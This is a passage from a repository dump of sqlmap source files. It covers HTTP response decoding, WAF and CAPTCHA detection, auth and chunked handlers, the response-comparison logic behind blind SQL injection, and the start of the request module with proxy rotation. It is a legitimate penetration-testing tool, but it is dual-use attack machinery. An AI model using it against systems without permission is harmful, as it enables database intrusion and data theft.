https://chardet.readthedocs.io/en/latest/usage.html\n\n    >>> getHeuristicCharEncoding(b\"<html></html>\")\n    'ascii'\n    \"\"\"\n\n    key = hash(page)\n    retVal = kb.cache.encoding[key] if key in kb.cache.encoding else detect(page[:HEURISTIC_PAGE_SIZE_THRESHOLD])[\"encoding\"]\n    kb.cache.encoding[key] = retVal\n\n    if retVal and retVal.lower().replace('-', \"\") == UNICODE_ENCODING.lower().replace('-', \"\"):\n        infoMsg = \"heuristics detected web page charset '%s'\" % retVal\n        singleTimeLogMessage(infoMsg, logging.INFO, retVal)\n\n    return retVal\n\ndef decodePage(page, contentEncoding, contentType, percentDecode=True):\n    \"\"\"\n    Decode compressed/charset HTTP response\n\n    >>> getText(decodePage(b\"<html>foo&amp;bar</html>\", None, \"text/html; charset=utf-8\"))\n    '<html>foo&bar</html>'\n    \"\"\"\n\n    if not page or (conf.nullConnection and len(page) < 2):\n        return getUnicode(page)\n\n    if hasattr(contentEncoding, \"lower\"):\n        contentEncoding = contentEncoding.lower()\n    else:\n        contentEncoding = \"\"\n\n    if hasattr(contentType, \"lower\"):\n        contentType = contentType.lower()\n    else:\n        contentType = \"\"\n\n    if contentEncoding in (\"gzip\", \"x-gzip\", \"deflate\"):\n        if not kb.pageCompress:\n            return None\n\n        try:\n            if contentEncoding == \"deflate\":\n                data = io.BytesIO(zlib.decompress(page, -15))  # Reference: http://stackoverflow.com/questions/1089662/python-inflate-and-deflate-implementations\n            else:\n                data = gzip.GzipFile(\"\", \"rb\", 9, io.BytesIO(page))\n                size = struct.unpack(\"<l\", page[-4:])[0]  # Reference: http://pydoc.org/get.cgi/usr/local/lib/python2.5/gzip.py\n                if size > MAX_CONNECTION_TOTAL_SIZE:\n                    raise Exception(\"size too large\")\n\n            page = data.read()\n        except Exception as ex:\n            if b\"<html\" not in page:  # in some cases, invalid \"Content-Encoding\" appears for plain HTML (should be ignored)\n                errMsg = \"detected invalid data for declared content \"\n                errMsg += \"encoding '%s' ('%s')\" % (contentEncoding, getSafeExString(ex))\n                singleTimeLogMessage(errMsg, logging.ERROR)\n\n                warnMsg = \"turning off page compression\"\n                singleTimeWarnMessage(warnMsg)\n\n                kb.pageCompress = False\n                raise SqlmapCompressionException\n\n    if not conf.encoding:\n        httpCharset, metaCharset = None, None\n\n        # Reference: http://stackoverflow.com/questions/1020892/python-urllib2-read-to-unicode\n        if contentType.find(\"charset=\") != -1:\n            httpCharset = checkCharEncoding(contentType.split(\"charset=\")[-1])\n\n        metaCharset = checkCharEncoding(extractRegexResult(META_CHARSET_REGEX, page))\n\n        if (any((httpCharset, metaCharset)) and (not all((httpCharset, metaCharset)) or isinstance(page, six.binary_type) and all(_ in PRINTABLE_BYTES for _ in page))) or (httpCharset == metaCharset and all((httpCharset, metaCharset))):\n            kb.pageEncoding = httpCharset or metaCharset  # Reference: http://bytes.com/topic/html-css/answers/154758-http-equiv-vs-true-header-has-precedence\n            debugMsg = \"declared web page charset '%s'\" % kb.pageEncoding\n            singleTimeLogMessage(debugMsg, logging.DEBUG, debugMsg)\n        else:\n            kb.pageEncoding = None\n    else:\n        kb.pageEncoding = conf.encoding\n\n    # can't do for all responses because we need to support binary files too\n    if isinstance(page, six.binary_type) and \"text/\" in contentType:\n        if not kb.disableHtmlDecoding:\n            # e.g. &#x9;&#195;&#235;&#224;&#226;&#224;\n            if b\"&#\" in page:\n                page = re.sub(b\"&#x([0-9a-f]{1,2});\", lambda _: decodeHex(_.group(1) if len(_.group(1)) == 2 else \"0%s\" % _.group(1)), page)\n                page = re.sub(b\"&#(\\\\d{1,3});\", lambda _: six.int2byte(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page)\n\n            # e.g. %20%28%29\n            if percentDecode:\n                if b\"%\" in page:\n                    page = re.sub(b\"%([0-9a-f]{2})\", lambda _: decodeHex(_.group(1)), page)\n                    page = re.sub(b\"%([0-9A-F]{2})\", lambda _: decodeHex(_.group(1)), page)     # Note: %DeepSee_SQL in CACHE\n\n            # e.g. &amp;\n            page = re.sub(b\"&([^;]+);\", lambda _: six.int2byte(HTML_ENTITIES[getText(_.group(1))]) if HTML_ENTITIES.get(getText(_.group(1)), 256) < 256 else _.group(0), page)\n\n            kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))\n\n            if (kb.pageEncoding or \"\").lower() == \"utf-8-sig\":\n                kb.pageEncoding = \"utf-8\"\n                if page and page.startswith(b\"\\xef\\xbb\\xbf\"):  # Reference: https://docs.python.org/2/library/codecs.html (Note: noticed problems when \"utf-8-sig\" is left to Python for handling)\n                    page = page[3:]\n\n            page = getUnicode(page, kb.pageEncoding)\n\n            # e.g. &#8217;&#8230;&#8482;\n            if \"&#\" in page:\n                def _(match):\n                    retVal = match.group(0)\n                    try:\n                        retVal = _unichr(int(match.group(1)))\n                    except (ValueError, OverflowError):\n                        pass\n                    return retVal\n                page = re.sub(r\"&#(\\d+);\", _, page)\n\n            # e.g. &zeta;\n            page = re.sub(r\"&([^;]+);\", lambda _: _unichr(HTML_ENTITIES[_.group(1)]) if HTML_ENTITIES.get(_.group(1), 0) > 255 else _.group(0), page)\n        else:\n            page = getUnicode(page, kb.pageEncoding)\n\n    return page\n\ndef processResponse(page, responseHeaders, code=None, status=None):\n    kb.processResponseCounter += 1\n\n    page = page or \"\"\n\n    parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None, status)\n\n    if not kb.tableFrom and Backend.getIdentifiedDbms() in (DBMS.ACCESS,):\n        kb.tableFrom = extractRegexResult(SELECT_FROM_TABLE_REGEX, page)\n    else:\n        kb.tableFrom = None\n\n    if conf.parseErrors:\n        msg = extractErrorMessage(page)\n\n        if msg:\n            logger.warning(\"parsed DBMS error message: '%s'\" % msg.rstrip('.'))\n\n    if not conf.skipWaf and kb.processResponseCounter < IDENTYWAF_PARSE_LIMIT:\n        rawResponse = \"%s %s %s\\n%s\\n%s\" % (_http_client.HTTPConnection._http_vsn_str, code or \"\", status or \"\", \"\".join(getUnicode(responseHeaders.headers if responseHeaders else [])), page[:HEURISTIC_PAGE_SIZE_THRESHOLD])\n\n        identYwaf.non_blind.clear()\n        if identYwaf.non_blind_check(rawResponse, silent=True):\n            for waf in identYwaf.non_blind:\n                if waf not in kb.identifiedWafs:\n                    kb.identifiedWafs.add(waf)\n                    errMsg = \"WAF/IPS identified as '%s'\" % identYwaf.format_name(waf)\n                    singleTimeLogMessage(errMsg, logging.CRITICAL)\n\n    if kb.originalPage is None:\n        for regex in (EVENTVALIDATION_REGEX, VIEWSTATE_REGEX):\n            match = re.search(regex, page)\n            if match and PLACE.POST in conf.parameters:\n                name, value = match.groups()\n                if PLACE.POST in conf.paramDict and name in conf.paramDict[PLACE.POST]:\n                    if conf.paramDict[PLACE.POST][name] in page:\n                        continue\n                    else:\n                        msg = \"do you want to automatically adjust the value of '%s'? [y/N]\" % name\n\n                        if not readInput(msg, default='N', boolean=True):\n                            continue\n\n                        conf.paramDict[PLACE.POST][name] = value\n                conf.parameters[PLACE.POST] = re.sub(r\"(?i)(%s=)[^&]+\" % re.escape(name), r\"\\g<1>%s\" % value.replace('\\\\', r'\\\\'), conf.parameters[PLACE.POST])\n\n    if not kb.browserVerification and re.search(r\"(?i)browser.?verification\", page or \"\"):\n        kb.browserVerification = True\n        warnMsg = \"potential browser verification protection mechanism detected\"\n        if re.search(r\"(?i)CloudFlare\", page):\n            warnMsg += \" (CloudFlare)\"\n        singleTimeWarnMessage(warnMsg)\n\n    if not kb.captchaDetected and re.search(r\"(?i)captcha\", page or \"\"):\n        for match in re.finditer(r\"(?si)<form.+?</form>\", page):\n            if re.search(r\"(?i)captcha\", match.group(0)):\n                kb.captchaDetected = True\n                break\n\n        if re.search(r\"<meta[^>]+\\brefresh\\b[^>]+\\bcaptcha\\b\", page):\n            kb.captchaDetected = True\n\n        if kb.captchaDetected:\n            warnMsg = \"potential CAPTCHA protection mechanism detected\"\n            if re.search(r\"(?i)<title>[^<]*CloudFlare\", page):\n                warnMsg += \" (CloudFlare)\"\n            singleTimeWarnMessage(warnMsg)\n\n    if re.search(BLOCKED_IP_REGEX, page):\n        warnMsg = \"it appears that you have been blocked by the target server\"\n        singleTimeWarnMessage(warnMsg)\n"
  },
  {
    "path": "sqlmap/lib/request/basicauthhandler.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom thirdparty.six.moves import urllib as _urllib\n\nclass SmartHTTPBasicAuthHandler(_urllib.request.HTTPBasicAuthHandler):\n    \"\"\"\n    Reference: http://selenic.com/hg/rev/6c51a5056020\n    Fix for a: http://bugs.python.org/issue8797\n    \"\"\"\n\n    def __init__(self, *args, **kwargs):\n        _urllib.request.HTTPBasicAuthHandler.__init__(self, *args, **kwargs)\n        self.retried_req = set()\n        self.retried_count = 0\n\n    def reset_retry_count(self):\n        # Python 2.6.5 will call this on 401 or 407 errors and thus loop\n        # forever. We disable reset_retry_count completely and reset in\n        # http_error_auth_reqed instead.\n        pass\n\n    def http_error_auth_reqed(self, auth_header, host, req, headers):\n        # Reset the retry counter once for each request.\n        if hash(req) not in self.retried_req:\n            self.retried_req.add(hash(req))\n            self.retried_count = 0\n        else:\n            if self.retried_count > 5:\n                raise _urllib.error.HTTPError(req.get_full_url(), 401, \"basic auth failed\", headers, None)\n            else:\n                self.retried_count += 1\n\n        return _urllib.request.HTTPBasicAuthHandler.http_error_auth_reqed(self, auth_header, host, req, headers)\n"
  },
  {
    "path": "sqlmap/lib/request/chunkedhandler.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import conf\nfrom lib.core.enums import HTTP_HEADER\nfrom thirdparty.six.moves import urllib as _urllib\n\nclass ChunkedHandler(_urllib.request.HTTPHandler):\n    \"\"\"\n    Ensures that HTTPHandler is working properly in case of Chunked Transfer-Encoding\n    \"\"\"\n\n    def _http_request(self, request):\n        host = request.get_host() if hasattr(request, \"get_host\") else request.host\n        if not host:\n            raise _urllib.error.URLError(\"no host given\")\n\n        if request.data is not None:  # POST\n            data = request.data\n            if not request.has_header(HTTP_HEADER.CONTENT_TYPE):\n                request.add_unredirected_header(HTTP_HEADER.CONTENT_TYPE, \"application/x-www-form-urlencoded\")\n            if not request.has_header(HTTP_HEADER.CONTENT_LENGTH) and not conf.chunked:\n                request.add_unredirected_header(HTTP_HEADER.CONTENT_LENGTH, \"%d\" % len(data))\n\n        sel_host = host\n        if request.has_proxy():\n            sel_host = _urllib.parse.urlsplit(request.get_selector()).netloc\n\n        if not request.has_header(HTTP_HEADER.HOST):\n            request.add_unredirected_header(HTTP_HEADER.HOST, sel_host)\n        for name, value in self.parent.addheaders:\n            name = name.capitalize()\n            if not request.has_header(name):\n                request.add_unredirected_header(name, value)\n        return request\n\n    http_request = _http_request\n"
  },
  {
    "path": "sqlmap/lib/request/comparison.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import division\n\nimport re\n\nfrom lib.core.common import extractRegexResult\nfrom lib.core.common import getFilteredPageContent\nfrom lib.core.common import listToStrValue\nfrom lib.core.common import removeDynamicContent\nfrom lib.core.common import getLastRequestHTTPError\nfrom lib.core.common import wasLastResponseDBMSError\nfrom lib.core.common import wasLastResponseHTTPError\nfrom lib.core.convert import getBytes\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.settings import DEFAULT_PAGE_ENCODING\nfrom lib.core.settings import DIFF_TOLERANCE\nfrom lib.core.settings import HTML_TITLE_REGEX\nfrom lib.core.settings import LOWER_RATIO_BOUND\nfrom lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH\nfrom lib.core.settings import MAX_RATIO\nfrom lib.core.settings import MIN_RATIO\nfrom lib.core.settings import REFLECTED_VALUE_MARKER\nfrom lib.core.settings import UPPER_RATIO_BOUND\nfrom lib.core.settings import URI_HTTP_HEADER\nfrom lib.core.threads import getCurrentThreadData\nfrom thirdparty import six\n\ndef comparison(page, headers, code=None, getRatioValue=False, pageLength=None):\n    _ = _adjust(_comparison(page, headers, code, getRatioValue, pageLength), getRatioValue)\n    return _\n\ndef _adjust(condition, getRatioValue):\n    if not any((conf.string, conf.notString, conf.regexp, conf.code)):\n        # Negative logic approach is used in raw page comparison scheme as that what is \"different\" than original\n        # PAYLOAD.WHERE.NEGATIVE response is considered as True; in switch based approach negative logic is not\n        # applied as that what is by user considered as True is that what is returned by the comparison mechanism\n        # itself\n        retVal = not condition if kb.negativeLogic and condition is not None and not getRatioValue else condition\n    else:\n        retVal = condition if not getRatioValue else (MAX_RATIO if condition else MIN_RATIO)\n\n    return retVal\n\ndef _comparison(page, headers, code, getRatioValue, pageLength):\n    threadData = getCurrentThreadData()\n\n    if kb.testMode:\n        threadData.lastComparisonHeaders = listToStrValue(_ for _ in headers.headers if not _.startswith(\"%s:\" % URI_HTTP_HEADER)) if headers else \"\"\n        threadData.lastComparisonPage = page\n        threadData.lastComparisonCode = code\n\n    if page is None and pageLength is None:\n        return None\n\n    if any((conf.string, conf.notString, conf.regexp)):\n        rawResponse = \"%s%s\" % (listToStrValue(_ for _ in headers.headers if not _.startswith(\"%s:\" % URI_HTTP_HEADER)) if headers else \"\", page)\n\n        # String to match in page when the query is True\n        if conf.string:\n            return conf.string in rawResponse\n\n        # String to match in page when the query is False\n        if conf.notString:\n            if conf.notString in rawResponse:\n                return False\n            else:\n                if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()):\n                    return None\n                else:\n                    return True\n\n        # Regular expression to match in page when the query is True and/or valid\n        if conf.regexp:\n            return re.search(conf.regexp, rawResponse, re.I | re.M) is not None\n\n    # HTTP code to match when the query is valid\n    if conf.code:\n        return conf.code == code\n\n    seqMatcher = threadData.seqMatcher\n    seqMatcher.set_seq1(kb.pageTemplate)\n\n    if page:\n        # In case of an DBMS error page return None\n        if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()) and not kb.negativeLogic:\n            if not (wasLastResponseHTTPError() and getLastRequestHTTPError() in (conf.ignoreCode or [])):\n                return None\n\n        # Dynamic content lines to be excluded before comparison\n        if not kb.nullConnection:\n            page = removeDynamicContent(page)\n            seqMatcher.set_seq1(removeDynamicContent(kb.pageTemplate))\n\n        if not pageLength:\n            pageLength = len(page)\n\n    if kb.nullConnection and pageLength:\n        if not seqMatcher.a:\n            errMsg = \"problem occurred while retrieving original page content \"\n            errMsg += \"which prevents sqlmap from continuation. Please rerun, \"\n            errMsg += \"and if the problem persists turn off any optimization switches\"\n            raise SqlmapNoneDataException(errMsg)\n\n        ratio = 1. * pageLength / len(seqMatcher.a)\n\n        if ratio > 1.:\n            ratio = 1. / ratio\n    else:\n        # Preventing \"Unicode equal comparison failed to convert both arguments to Unicode\"\n        # (e.g. if one page is PDF and the other is HTML)\n        if isinstance(seqMatcher.a, six.binary_type) and isinstance(page, six.text_type):\n            page = getBytes(page, kb.pageEncoding or DEFAULT_PAGE_ENCODING, \"ignore\")\n        elif isinstance(seqMatcher.a, six.text_type) and isinstance(page, six.binary_type):\n            seqMatcher.a = getBytes(seqMatcher.a, kb.pageEncoding or DEFAULT_PAGE_ENCODING, \"ignore\")\n\n        if any(_ is None for _ in (page, seqMatcher.a)):\n            return None\n        elif seqMatcher.a and page and seqMatcher.a == page:\n            ratio = 1.\n        elif kb.skipSeqMatcher or seqMatcher.a and page and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (seqMatcher.a, page)):\n            if not page or not seqMatcher.a:\n                return float(seqMatcher.a == page)\n            else:\n                ratio = 1. * len(seqMatcher.a) / len(page)\n                if ratio > 1:\n                    ratio = 1. / ratio\n        else:\n            seq1, seq2 = None, None\n\n            if conf.titles:\n                seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a)\n                seq2 = extractRegexResult(HTML_TITLE_REGEX, page)\n            else:\n                seq1 = getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a\n                seq2 = getFilteredPageContent(page, True) if conf.textOnly else page\n\n            if seq1 is None or seq2 is None:\n                return None\n\n            seq1 = seq1.replace(REFLECTED_VALUE_MARKER, \"\")\n            seq2 = seq2.replace(REFLECTED_VALUE_MARKER, \"\")\n\n            if kb.heavilyDynamic:\n                seq1 = seq1.split(\"\\n\")\n                seq2 = seq2.split(\"\\n\")\n\n                key = None\n            else:\n                key = (hash(seq1), hash(seq2))\n\n            seqMatcher.set_seq1(seq1)\n            seqMatcher.set_seq2(seq2)\n\n            if key in kb.cache.comparison:\n                ratio = kb.cache.comparison[key]\n            else:\n                ratio = round(seqMatcher.quick_ratio() if not kb.heavilyDynamic else seqMatcher.ratio(), 3)\n\n            if key:\n                kb.cache.comparison[key] = ratio\n\n    # If the url is stable and we did not set yet the match ratio and the\n    # current injected value changes the url page content\n    if kb.matchRatio is None:\n        if ratio >= LOWER_RATIO_BOUND and ratio <= UPPER_RATIO_BOUND:\n            kb.matchRatio = ratio\n            logger.debug(\"setting match ratio for current parameter to %.3f\" % kb.matchRatio)\n\n    if kb.testMode:\n        threadData.lastComparisonRatio = ratio\n\n    # If it has been requested to return the ratio and not a comparison\n    # response\n    if getRatioValue:\n        return ratio\n\n    elif ratio > UPPER_RATIO_BOUND:\n        return True\n\n    elif ratio < LOWER_RATIO_BOUND:\n        return False\n\n    elif kb.matchRatio is None:\n        return None\n\n    else:\n        return (ratio - kb.matchRatio) > DIFF_TOLERANCE\n"
  },
  {
    "path": "sqlmap/lib/request/connect.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport binascii\nimport inspect\nimport logging\nimport os\nimport random\nimport re\nimport socket\nimport string\nimport struct\nimport sys\nimport time\nimport traceback\n\ntry:\n    import websocket\n    from websocket import WebSocketException\nexcept ImportError:\n    class WebSocketException(Exception):\n        pass\n\nfrom lib.core.agent import agent\nfrom lib.core.common import asciifyUrl\nfrom lib.core.common import calculateDeltaSeconds\nfrom lib.core.common import checkFile\nfrom lib.core.common import checkSameHost\nfrom lib.core.common import chunkSplitPostData\nfrom lib.core.common import clearConsoleLine\nfrom lib.core.common import dataToStdout\nfrom lib.core.common import escapeJsonValue\nfrom lib.core.common import evaluateCode\nfrom lib.core.common import extractRegexResult\nfrom lib.core.common import filterNone\nfrom lib.core.common import findMultipartPostBoundary\nfrom lib.core.common import getCurrentThreadData\nfrom lib.core.common import getHeader\nfrom lib.core.common import getHostHeader\nfrom lib.core.common import getRequestHeader\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import logHTTPTraffic\nfrom lib.core.common import openFile\nfrom lib.core.common import popValue\nfrom lib.core.common import parseJson\nfrom lib.core.common import pushValue\nfrom lib.core.common import randomizeParameterValue\nfrom lib.core.common import randomInt\nfrom lib.core.common import randomStr\nfrom lib.core.common import readInput\nfrom lib.core.common import removeReflectiveValues\nfrom lib.core.common import safeVariableNaming\nfrom lib.core.common import singleTimeLogMessage\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.common import stdev\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.common import unsafeVariableNaming\nfrom lib.core.common import urldecode\nfrom lib.core.common import urlencode\nfrom lib.core.common import wasLastResponseDelayed\nfrom lib.core.compat import patchHeaders\nfrom lib.core.compat import xrange\nfrom lib.core.convert import encodeBase64\nfrom lib.core.convert import getBytes\nfrom lib.core.convert import getText\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import cmdLineOptions\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.datatype import AttribDict\nfrom lib.core.decorators import stackedmethod\nfrom lib.core.dicts import POST_HINT_CONTENT_TYPES\nfrom lib.core.enums import ADJUST_TIME_DELAY\nfrom lib.core.enums import AUTH_TYPE\nfrom lib.core.enums import CUSTOM_LOGGING\nfrom lib.core.enums import HINT\nfrom lib.core.enums import HTTP_HEADER\nfrom lib.core.enums import HTTPMETHOD\nfrom lib.core.enums import NULLCONNECTION\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.enums import PLACE\nfrom lib.core.enums import POST_HINT\nfrom lib.core.enums import REDIRECTION\nfrom lib.core.enums import WEB_PLATFORM\nfrom lib.core.exception import SqlmapCompressionException\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.exception import SqlmapGenericException\nfrom lib.core.exception import SqlmapSkipTargetException\nfrom lib.core.exception import SqlmapSyntaxException\nfrom lib.core.exception import SqlmapTokenException\nfrom lib.core.exception import SqlmapValueException\nfrom lib.core.settings import ASTERISK_MARKER\nfrom lib.core.settings import BOUNDARY_BACKSLASH_MARKER\nfrom lib.core.settings import DEFAULT_CONTENT_TYPE\nfrom lib.core.settings import DEFAULT_COOKIE_DELIMITER\nfrom lib.core.settings import DEFAULT_GET_POST_DELIMITER\nfrom lib.core.settings import DEFAULT_USER_AGENT\nfrom lib.core.settings import EVALCODE_ENCODED_PREFIX\nfrom lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE\nfrom lib.core.settings import HTTP_ACCEPT_HEADER_VALUE\nfrom lib.core.settings import IPS_WAF_CHECK_PAYLOAD\nfrom lib.core.settings import IS_WIN\nfrom lib.core.settings import JAVASCRIPT_HREF_REGEX\nfrom lib.core.settings import LARGE_READ_TRIM_MARKER\nfrom lib.core.settings import LIVE_COOKIES_TIMEOUT\nfrom lib.core.settings import MAX_CONNECTION_READ_SIZE\nfrom lib.core.settings import MAX_CONNECTIONS_REGEX\nfrom lib.core.settings import MAX_CONNECTION_TOTAL_SIZE\nfrom lib.core.settings import MAX_CONSECUTIVE_CONNECTION_ERRORS\nfrom lib.core.settings import MAX_MURPHY_SLEEP_TIME\nfrom lib.core.settings import META_REFRESH_REGEX\nfrom lib.core.settings import MAX_TIME_RESPONSES\nfrom lib.core.settings import MIN_TIME_RESPONSES\nfrom lib.core.settings import PAYLOAD_DELIMITER\nfrom lib.core.settings import PERMISSION_DENIED_REGEX\nfrom lib.core.settings import PLAIN_TEXT_CONTENT_TYPE\nfrom lib.core.settings import RANDOM_INTEGER_MARKER\nfrom lib.core.settings import RANDOM_STRING_MARKER\nfrom lib.core.settings import REPLACEMENT_MARKER\nfrom lib.core.settings import TEXT_CONTENT_TYPE_REGEX\nfrom lib.core.settings import UNENCODED_ORIGINAL_VALUE\nfrom lib.core.settings import UNICODE_ENCODING\nfrom lib.core.settings import URI_HTTP_HEADER\nfrom lib.core.settings import WARN_TIME_STDEV\nfrom lib.core.settings import WEBSOCKET_INITIAL_TIMEOUT\nfrom lib.core.settings import YUGE_FACTOR\nfrom lib.request.basic import decodePage\nfrom lib.request.basic import forgeHeaders\nfrom lib.request.basic import processResponse\nfrom lib.request.comparison import comparison\nfrom lib.request.direct import direct\nfrom lib.request.methodrequest import MethodRequest\nfrom lib.utils.safe2bin import safecharencode\nfrom thirdparty import six\nfrom thirdparty.odict import OrderedDict\nfrom thirdparty.six import unichr as _unichr\nfrom thirdparty.six.moves import http_client as _http_client\nfrom thirdparty.six.moves import urllib as _urllib\nfrom thirdparty.socks.socks import ProxyError\n\nclass Connect(object):\n    \"\"\"\n    This class defines methods used to perform HTTP requests\n    \"\"\"\n\n    @staticmethod\n    def _getPageProxy(**kwargs):\n        try:\n            if (len(inspect.stack()) > sys.getrecursionlimit() // 2):   # Note: https://github.com/sqlmapproject/sqlmap/issues/4525\n                warnMsg = \"unable to connect to the target URL\"\n                raise SqlmapConnectionException(warnMsg)\n        except (TypeError, UnicodeError):\n            pass\n\n        try:\n            return Connect.getPage(**kwargs)\n        except RuntimeError:\n            return None, None, None\n\n    @staticmethod\n    def _retryProxy(**kwargs):\n        threadData = getCurrentThreadData()\n        threadData.retriesCount += 1\n\n        if conf.proxyList and threadData.retriesCount >= conf.retries and not kb.locks.handlers.locked():\n            warnMsg = \"changing proxy\"\n            logger.warning(warnMsg)\n\n            conf.proxy = None\n            threadData.retriesCount = 0\n\n            setHTTPHandlers()\n\n        if kb.testMode and kb.previousMethod == PAYLOAD.METHOD.TIME:\n            # timed based payloads can cause web server unresponsiveness\n            # if the injectable piece of code is some kind of JOIN-like query\n            warnMsg = \"most likely web server instance hasn't recovered yet \"\n            warnMsg += \"from previous timed based payload. If the problem \"\n            warnMsg += \"persists please wait for a few minutes and rerun \"\n            warnMsg += \"without flag 'T' in option '--technique' \"\n            warnMsg += \"(e.g. '--flush-session --technique=BEUS') or try to \"\n            warnMsg += \"lower the value of option '--time-sec' (e.g. '--time-sec=2')\"\n            singleTimeWarnMessage(warnMsg)\n\n        elif kb.originalPage is None:\n            if conf.tor:\n                warnMsg = \"please make sure that you have \"\n                warnMsg += \"Tor installed and running so \"\n                warnMsg += \"you could successfully use \"\n                warnMsg += \"switch '--tor' \"\n                if IS_WIN:\n                    warnMsg += \"(e.g. 'https://www.torproject.org/download/')\"\n                else:\n                    warnMsg += \"(e.g. 'https://help.ubuntu.com/community/Tor')\"\n            else:\n                warnMsg = \"if the problem persists please check that the provided \"\n                warnMsg += \"target URL is reachable\"\n\n                items = []\n                if not conf.randomAgent:\n                    items.append(\"switch '--random-agent'\")\n                if not any((conf.proxy, conf.proxyFile, conf.tor)):\n                    items.append(\"proxy switches ('--proxy', '--proxy-file'...)\")\n                if items:\n                    warnMsg += \". In case that it is, \"\n                    warnMsg += \"you can try to rerun with \"\n                    warnMsg += \" and/or \".join(items)\n\n            singleTimeWarnMessage(warnMsg)\n\n        elif conf.threads > 1:\n            warnMsg = \"if the problem persists please try to lower \"\n            warnMsg += \"the number of used threads (option '--threads')\"\n            singleTimeWarnMessage(warnMsg)\n\n        kwargs['retrying'] = True\n        return Connect._getPageProxy(**kwargs)\n\n    @staticmethod\n    def _connReadProxy(conn):\n        retVal = b\"\"\n\n        if not kb.dnsMode and conn:\n            headers = conn.info()\n            if kb.pageCompress and headers and hasattr(headers, \"getheader\") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, \"\").lower() in (\"gzip\", \"deflate\") or \"text\" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, \"\").lower()):\n                retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)\n                if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:\n                    warnMsg = \"large compressed response detected. Disabling compression\"\n                    singleTimeWarnMessage(warnMsg)\n                    kb.pageCompress = False\n                    raise SqlmapCompressionException\n            else:\n                while True:\n                    if not conn:\n                        break\n                    else:\n                        try:\n                            part = conn.read(MAX_CONNECTION_READ_SIZE)\n                        except AssertionError:\n                            part = b\"\"\n\n                    if len(part) == MAX_CONNECTION_READ_SIZE:\n                        warnMsg = \"large response detected. This could take a while\"\n                        singleTimeWarnMessage(warnMsg)\n                        part = re.sub(getBytes(r\"(?si)%s.+?%s\" % (kb.chars.stop, kb.chars.start)), getBytes(\"%s%s%s\" % (kb.chars.stop, LARGE_READ_TRIM_MARKER, kb.chars.start)), part)\n                        retVal += part\n                    else:\n                        retVal += part\n                        break\n\n                    if len(retVal) > MAX_CONNECTION_TOTAL_SIZE:\n                        warnMsg = \"too large response detected. Automatically trimming it\"\n                        singleTimeWarnMessage(warnMsg)\n                        break\n\n        if conf.yuge:\n            retVal = YUGE_FACTOR * retVal\n\n        return retVal\n\n    @staticmethod\n    def getPage(**kwargs):\n        \"\"\"\n        This method connects to the target URL or proxy and returns\n        the target URL page content\n        \"\"\"\n\n        if conf.offline:\n            return None, None, None\n\n        url = kwargs.get(\"url\", None) or conf.url\n        get = kwargs.get(\"get\", None)\n        post = kwargs.get(\"post\", None)\n        method = kwargs.get(\"method\", None)\n        cookie = kwargs.get(\"cookie\", None)\n        ua = kwargs.get(\"ua\", None) or conf.agent\n        referer = kwargs.get(\"referer\", None) or conf.referer\n        host = kwargs.get(\"host\", None) or conf.host\n        direct_ = kwargs.get(\"direct\", False)\n        multipart = kwargs.get(\"multipart\", None)\n        silent = kwargs.get(\"silent\", False)\n        raise404 = kwargs.get(\"raise404\", True)\n        timeout = kwargs.get(\"timeout\", None) or conf.timeout\n        auxHeaders = kwargs.get(\"auxHeaders\", None)\n        response = kwargs.get(\"response\", False)\n        ignoreTimeout = kwargs.get(\"ignoreTimeout\", False) or kb.ignoreTimeout or conf.ignoreTimeouts\n        refreshing = kwargs.get(\"refreshing\", False)\n        retrying = kwargs.get(\"retrying\", False)\n        crawling = kwargs.get(\"crawling\", False)\n        checking = kwargs.get(\"checking\", False)\n        skipRead = kwargs.get(\"skipRead\", False)\n        finalCode = kwargs.get(\"finalCode\", False)\n        chunked = kwargs.get(\"chunked\", False) or conf.chunked\n\n        start = time.time()\n\n        if isinstance(conf.delay, (int, float)) and conf.delay > 0:\n            time.sleep(conf.delay)\n\n        threadData = getCurrentThreadData()\n        with kb.locks.request:\n            kb.requestCounter += 1\n            threadData.lastRequestUID = kb.requestCounter\n\n            if conf.proxyFreq:\n                if kb.requestCounter % conf.proxyFreq == 1:\n                    conf.proxy = None\n\n                    warnMsg = \"changing proxy\"\n                    logger.warning(warnMsg)\n\n                    setHTTPHandlers()\n\n        if conf.dummy or conf.murphyRate and randomInt() % conf.murphyRate == 0:\n            if conf.murphyRate:\n                time.sleep(randomInt() % (MAX_MURPHY_SLEEP_TIME + 1))\n\n            page, headers, code = 